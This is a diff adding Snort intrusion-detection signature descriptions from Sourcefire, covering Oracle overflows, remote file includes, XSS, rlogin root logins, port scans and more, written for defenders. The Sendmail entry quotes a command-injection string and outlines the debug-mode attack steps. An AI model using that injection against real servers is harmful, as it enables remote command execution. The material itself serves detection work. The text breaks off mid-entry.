+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2824.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2824
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure set_local_flavor
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000850.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000850
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "include.php" using a remote file being passed as the "lang_settings" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang_settings" parameter in the "include.php" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/986.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 986
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/606.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 606
+
+--
+Summary: 
+This event is generated when an attempt to login as the superuser is attempted using rlogin.
+
+--
+Impact: 
+Serious. If successful the attacker may have gained superuser access to the host.
+
+--
+Detailed Information: 
+This rule generates an event when a connection is made using "rlogin" with the username "root". Such activity is indicative of attempts to abuse insecure machines with a known default configuration. 
+
+Some UNIX systems use the "rlogin" daemon which permits remote "root" logins. This may allow an attacker to connect to the machine and establish an interactive session.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with the "rlogin" service running and connects to it, then proceeds to guess the "root" password
+
+--
+Ease of Attack:
+Simple, no exploit software required
+
+--
+False Positives: 
+A system administrator may be logging in to a host using the username "root"
+
+--
+False Negatives: 
+If a local username is not the same as the remote one ("root"), the rule will not generate an event.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+Deny remote root logins to the host, use a normal user and "sudo" or give the user the ability to "su" to root where appropriate.
+
+--
+Contributors:
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS389
+
+--
--- /dev/null
+++ b/doc/signatures/2709.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2709
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_instantiation
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1603.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1603
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000660.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000660
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "text" parameter in the "guestbook.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/663.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+663
+
+--
+Summary:
+This event is generated when the string "|sed -e '1,/^$/'" is found in the payload of a packet sent to a Sendmail server.  This may be an attempt to exploit a problem in older versions of Sendmail. 
+
+--
+Impact:
+Attempted administrator access.  A successful attack can allow remote execution of commands at the privilege level of Sendmail, usually root.
+
+--
+Detailed Information:
+A vulnerability exists in older versions of Sendmail associated with the debug mode.  Malformed text specifying the recipient could be a command that would execute at the privilege level of Sendmail, often times root.  The "sed" command is used to strip off the mail headers before executing the supplied command.  This vulnerability was exploited by the Morris worm.
+
+--
+Affected Systems:
+Sendmail versions prior to 5.5.9.
+
+--
+Attack Scenarios:
+An attacker can craft a recipient name that is a command. This command executes arbitrary code on the server. 
+
+--
+Ease of Attack:
+Easy.  An attacker can telnet to port 25 of a vulnerable server, enter debug mode, and craft a malicious recipient containing a command to be executed.
+
+--
+False Positives:
+It is possible that this event may be generated by text in the DATA section of a pipelined SMTP transaction.
+
+--
+False Negatives:
+This rule generates an event based on a specific string in the packet payload.  An attacker could craft payloads with other malicious commands.
+
+--
+Corrective Action:
+Upgrade to Sendmail version 5.5.9 or higher.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095
+
+Arachnids:
+http://www.whitehats.com/info/IDS172
+
+
+--
--- /dev/null
+++ b/doc/signatures/3000.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3000
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2548.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2548
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the web interface support for the HP JetAdmin printer.
+
+--
+Impact:
+A successful attack may allow unauthorized files to be read or the injection 
+of a .hts script on a vulnerable server.
+
+--
+Detailed Information:
+The HP Web JetAdmin provides a web interface for the administration of the HP
+Web JetAdmin printer.  A vulnerability exists that allows unauthorized
+files to be read or a .hts script to be executed.  This is caused when the
+/plugins/hpjdwm/script/test/setinfo.hts script is supplied a value to the
+setinclude parameter that represents an unauthorized file to be read outside
+the web root or represents a .hts file that will be executed with system
+privileges on the vulnerable server. 
+
+--
+Affected Systems:
+HP Web JetAdmin 7.2.
+
+--
+Attack Scenarios:
+An attacker can execute the vulnerable script and supply a value to setinclude
+indicating an unauthorized file to be read or an .hts file to be executed. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+An authorized administrator who uses the setinclude parameter with the above
+script from a source IP outside of the trusted network will cause a false positive alert.
+
+--
+False Negatives:
+The default HP Web JetAdmin port is 8000.  If an administrator selects a different port
+on which to run the web interface, no alert will be detected.  In that case, the rule
+should be altered to reflect the port on which the web interface runs.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch
+when it becomes available.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9972
+
+--
--- /dev/null
+++ b/doc/signatures/100000607.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000607
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_add.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_add.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2807.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2807
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure specify_new_masters
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1799.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1799
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "fisting".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "fisting".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/289.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+289
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+QUALCOMM Qpopper POP3 buffer overflow vulnerability in SCO OpenServer 
+systems.
+
+--
+Impact:
+Remote execution of arbitrary code leading to remote root compromise.
+
+--
+Detailed Information:
+An exploit is available that takes advantage of a buffer overflow 
+vulnerability in QUALCOMM Qpopper POP3 mail server version 2.53 or 
+earlier. This exploit can be used to obtain root access to the 
+compromised server.
+
+--
+Affected Systems:
+SCO servers that ship QUALCOMM Qpopper POP3 server version 2.53 or 
+earlier:
+ -SCO OpenServer Enterprise System Release 5.0.5, 5.0.6, 5.0.6a
+ -SCO OpenServer Host System Release 5.0.5, 5.0.6, 5.0.6a
+ -SCO OpenServer Desktop System Release 5.0.5, 5.0.6, 5.0.6a
+ -SCO OpenServer Enterprise System Release 5.0.4
+ -SCO OpenServer Host System Release 5.0.4
+ -SCO OpenServer Desktop System Release 5.0.4
+
+--
+Attack Scenarios:
+An attacker executes exploit code against a vulnerable server and 
+obtains root privileges on the compromised computer.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade QUALCOMM Qpopper. See ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.8/ for patched binaries for SCO OpenServer and an advisory with installation instructions.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-1998-08.html
+
+--
--- /dev/null
+++ b/doc/signatures/119-16.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+119-16
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of an oversized chunk encoded request. This may be an indicator of
+an attack against a web server.
+
+This event may also indicate the use of http tunneling.
+
+--
+Affected Systems:
+	Apache
+
+--
+Attack Scenarios: 
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/2924.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2924
+
+--
+Summary:
+This event is generated when repeated failed attempts are made to access
+an SMB share.
+ 
+--
+Impact:
+Unknown. Possible information disclosure and loss of data.
+
+--
+Detailed Information:
+This event indicates that multiple failed attempts have been made to
+access an SMB network share. This may indicate a determined effort by an
+unauthorized user to access information and data on a network share.
+
+--
+Affected Systems:
+	All systems sharing resources using SMB
+
+--
+Attack Scenarios:
+An attacker can make repeated attempts to access network shares in an
+attempt to gain information.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply strict access control to all networked resources.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3029.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3029
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2588.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2588
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application TUTOS.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application TUTOS. The PHP application
+TUTOS is vulnerable to a path disclosure bug which may allow an attacker
+to gain information that can be used in further attacks against the
+system.
+
+The vulnerability surrounds the file note_overview.php, by manipulating
+input to the file an attacker may be presented with sensitive
+information regarding the system.
+
+--
+Affected Systems:
+	All systems using TUTOS.
+
+--
+Attack Scenarios:
+An attacker can leverage this vulnerability to gain information that may
+be useful in further attacks against the system.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-17.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-17
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/921.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+921
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1924.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1924
+
+--
+Summary:
+This event is generated when a request is made to Network File System (NFS) to list all file systems and which clients are permitted to mount each file system. 
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover exported NFS file systems and client mount permissions.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of exported file systems and client mount permissions.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
